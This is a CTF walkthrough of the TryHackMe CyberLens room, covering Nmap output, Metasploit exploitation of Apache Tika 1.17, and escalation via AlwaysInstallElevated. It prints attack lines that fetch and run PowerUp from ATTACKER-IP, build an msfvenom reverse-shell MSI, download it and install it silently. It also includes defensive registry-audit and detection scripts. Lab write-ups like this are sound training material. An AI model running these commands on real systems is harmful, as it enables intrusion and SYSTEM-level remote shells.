Windows Privilege Escalation with Metasploit | TryHackMe CyberLens CTF

We covered a very easy penetration testing challenge where we started with an Nmap scan followed by web enumeration; we then found a vulnerability in Apache Tika version 1.17, for which a ready-made exploit is available in Metasploit.

Using Metasploit, the vulnerability was exploited, initial access was obtained, and privileges were escalated on the Windows machine after running the exploit suggester and finding that AlwaysInstallElevated is enabled. This was part of the TryHackMe CyberLens CTF.

Task Scenario

Welcome to the clandestine world of CyberLens, where shadows dance amidst the digital domain and metadata reveals the secrets that lie concealed within every image. As you embark on this thrilling journey, prepare to unveil the hidden matrix of information that lurks beneath the surface, for here at CyberLens, we make metadata our playground.

In this labyrinthine realm of cyber security, we have mastered the arcane arts of digital forensics and image analysis. Armed with advanced techniques and cutting-edge tools, we delve into the very fabric of digital images, peeling back layers of information to expose the unseen stories they yearn to tell.

Picture yourself as a modern-day investigator, equipped not only with technical prowess but also with a keen eye for detail. Our team of elite experts will guide you through the intricate paths of image analysis, where file structures and data patterns provide valuable insights into the origins and nature of digital artifacts.

At CyberLens, we believe that every pixel holds a story, and it is our mission to decipher those stories and extract the truth. Join us on this exciting adventure as we navigate the digital landscape and uncover the hidden narratives that await us at every turn.

Can you exploit the CyberLens web server and discover the hidden flags?

Highlights

Nmap scanning output

─# nmap -A 10.10.189.206 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 09:40 EDT
Nmap scan report for cyberlens.thm (10.10.189.206)
Host is up (0.10s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-17T13:10:13
|_Not valid after:  2024-11-16T13:10:13
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-18T13:47:39+00:00
|_ssl-date: 2024-05-18T13:47:47+00:00; -10s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7)... redacted ...        
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-18T13:47:41
|_  start_date: N/A
|_clock-skew: mean: -10s, deviation: 0s, median: -10s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   125.60 ms 10.9.0.1
2   121.35 ms cyberlens.thm (10.10.189.206)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 464.64 seconds

Exploiting Windows using Metasploit

According to the enumeration, the service running on port 61777 is Apache Tika 1.17, which is vulnerable. Note that this port is outside Nmap's default top-1000 list, so it does not show up in the scan above (which covered 1000 ports); a full-port scan such as -p- is needed to reveal it.

Below is the right module for this vulnerability:

msf > use exploit/windows/http/apache_tika_jp2_jscript
msf exploit(apache_tika_jp2_jscript) > show targets
    ...targets...
msf exploit(apache_tika_jp2_jscript) > set TARGET < target-id >
msf exploit(apache_tika_jp2_jscript) > show options
    ...show and set options...
msf exploit(apache_tika_jp2_jscript) > exploit        

Module Description from Rapid7:

This module exploits a command injection vulnerability in Apache Tika 1.15–1.17 on Windows. A file with the image/jp2 content-type is used to bypass magic bytes checking. When OCR is specified in the request, parameters can be passed to change the parameters passed at command line to allow for arbitrary JScript to execute. A JScript stub is passed to execute arbitrary code. This module was verified against version 1.15–1.17 on Windows 2012. While the CVE and finding show more versions vulnerable, during testing it was determined only > 1.14 was exploitable due to jp2 support being added.

Downloading and executing the PowerUp script to perform Windows privilege escalation

# target machine (PowerShell)
# load PowerUp into the current session from the copy hosted on the attacker machine
PS C:\Users\CyberLens\Desktop> iex (iwr -UseBasicParsing https://ATTACKER-IP/PowerUp.ps1)
# run every PowerUp check; the AlwaysInstallElevated misconfiguration is reported here
PS C:\Users\CyberLens\Desktop> Invoke-AllChecks
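The AlwaysInstallElevated finding that Invoke-AllChecks reports comes from two registry values, and Windows Installer honours the policy only when both the machine-wide (HKLM) and the per-user (HKCU) value are set to 1. The PowerShell audit below is an added example written for this post; it is not part of the original walkthrough or of PowerUp. It reads both values, tells you whether the policy is actually effective on the host, and carries the remediation (set both values to 0, or disable the policy through Group Policy) in a function you call only when you intend to change the box. The function names Get-AlwaysInstallElevatedState, Test-AlwaysInstallElevated and Repair-AlwaysInstallElevated are this example's own.

```powershell
# Added example (not part of the original walkthrough): audit the AlwaysInstallElevated
# policy that PowerUp reports. Windows Installer only honours the setting when BOTH the
# machine-wide and the per-user value are 1, so the audit reads both hives.
# Reading works as a standard user; Repair-AlwaysInstallElevated needs an elevated prompt.

$policyPath = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$hives = @{
    'HKLM' = "HKLM:\$policyPath"
    'HKCU' = "HKCU:\$policyPath"
}

function Get-AlwaysInstallElevatedState {
    $state = @{}
    foreach ($hive in $hives.Keys) {
        $value = Get-ItemProperty -Path $hives[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        # A missing key or value is the secure default and is treated as 0
        $state[$hive] = if ($null -ne $value) { [int]$value.AlwaysInstallElevated } else { 0 }
    }
    return $state
}

function Test-AlwaysInstallElevated {
    $state = Get-AlwaysInstallElevatedState
    # The policy is only effective (and only exploitable) when both hives say 1
    return ($state['HKLM'] -eq 1 -and $state['HKCU'] -eq 1)
}

function Repair-AlwaysInstallElevated {
    # Remediation: set the value to 0 in both hives. The Group Policy equivalent is
    # Computer Configuration / User Configuration > Administrative Templates >
    # Windows Components > Windows Installer > "Always install with elevated privileges" = Disabled
    foreach ($path in $hives.Values) {
        if (Test-Path $path) {
            Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

$state = Get-AlwaysInstallElevatedState
"HKLM AlwaysInstallElevated = $($state['HKLM']); HKCU AlwaysInstallElevated = $($state['HKCU'])"
if (Test-AlwaysInstallElevated) {
    Write-Warning 'AlwaysInstallElevated is enabled in both hives: any user can install an MSI as SYSTEM.'
    # Repair-AlwaysInstallElevated   # uncomment to apply the fix
} else {
    'AlwaysInstallElevated is not effective on this host.'
}
```

Because the check treats a missing key as 0, it reports the real state rather than just the presence of the value; a host where only HKLM is set to 1 is flagged as not effective, which matches how msiexec evaluates the policy.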

Generating and executing an MSI payload using Msfvenom

# attacker machine
# build a 64-bit reverse-shell MSI; with AlwaysInstallElevated the installer runs as SYSTEM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER-IP LPORT=4546 -f msi > shell.msi
# target machine (PowerShell; wget is an alias of Invoke-WebRequest, so the switch is -OutFile)
wget https://ATTACKER-IP/shell.msi -OutFile C:\temp\shell.msi
# silent, unattended install of the package
msiexec /quiet /qn /i C:\temp\shell.msi
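From the defender's side, the install step above has a recognisable shape: msiexec.exe started with a silent switch against a package that sits in a user-writable directory such as C:\temp. The PowerShell below is an added example, not code from the post, that runs that rule over three constructed Sysmon Event ID 1 (process creation) records embedded inline; in practice you would feed it events from Get-WinEvent on the Microsoft-Windows-Sysmon/Operational log or from your SIEM. The function names Test-SuspiciousMsiExec and Get-SuspiciousMsiInstalls, the sample records and the list of user-writable paths are this example's own assumptions. Only the first record (the silent install of C:\temp\shell.msi launched from a PowerShell parent) is reported; the SYSTEM-owned msiexec service instance and an interactive install from Program Files are not.

```powershell
# Added example (not part of the original walkthrough): detection rule for silent
# MSI installs from user-writable paths, the footprint of AlwaysInstallElevated abuse.
# The records below are constructed to mimic Sysmon Event ID 1 fields; in production
# pull them from Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' or a SIEM.

$sampleEvents = @(
    @{ Time = '2024-05-18T13:50:01'; User = 'CYBERLENS\CyberLens'
       ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       Image = 'C:\Windows\System32\msiexec.exe'
       CommandLine = 'msiexec /quiet /qn /i C:\temp\shell.msi' },
    @{ Time = '2024-05-18T13:52:10'; User = 'NT AUTHORITY\SYSTEM'
       ParentImage = 'C:\Windows\System32\services.exe'
       Image = 'C:\Windows\System32\msiexec.exe'
       CommandLine = 'C:\Windows\system32\msiexec.exe /V' },
    @{ Time = '2024-05-18T13:55:42'; User = 'CYBERLENS\admin'
       ParentImage = 'C:\Windows\explorer.exe'
       Image = 'C:\Windows\System32\msiexec.exe'
       CommandLine = 'msiexec /i "C:\Program Files\Vendor\setup.msi"' }
)

# Directories a standard user can normally write to (assumed list; extend for your environment)
$userWritablePattern = '(?i)^(C:\\temp\\|C:\\Users\\|C:\\Windows\\Temp\\|C:\\ProgramData\\|\\\\)'

function Test-SuspiciousMsiExec {
    param([hashtable]$Record)

    if ($Record.Image -notmatch '(?i)\\msiexec\.exe$') { return $false }
    $cmd = $Record.CommandLine

    # Silent or unattended install switches
    $silent = $cmd -match '(?i)(^|\s)/(quiet|qn|qb|q|passive)(\s|$)'

    # Package path following /i or /package, quoted or not
    $package = $null
    if ($cmd -match '(?i)/(i|package)\s+"?([^"]+?\.msi)"?') { $package = $Matches[2] }
    if (-not $package) { return $false }

    return ($silent -and ($package -match $userWritablePattern))
}

function Get-SuspiciousMsiInstalls {
    param([hashtable[]]$Events)
    foreach ($e in $Events) {
        if (Test-SuspiciousMsiExec -Record $e) {
            [pscustomobject]@{
                Time        = $e.Time
                User        = $e.User
                ParentImage = $e.ParentImage
                CommandLine = $e.CommandLine
            }
        }
    }
}

Get-SuspiciousMsiInstalls -Events $sampleEvents | Format-Table -AutoSize
```

The parent image is carried through into the alert deliberately: a silent msiexec whose parent is powershell.exe or cmd.exe under an interactive user account is a much stronger signal than the same command line spawned by a software-deployment agent, so it is the first field an analyst will want when triaging.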

Room Answers

Room answers can be found here.

Video Walkthrough | TryHackMe CyberLens CTF


要查看或添加评论,请登录

社区洞察

其他会员也浏览了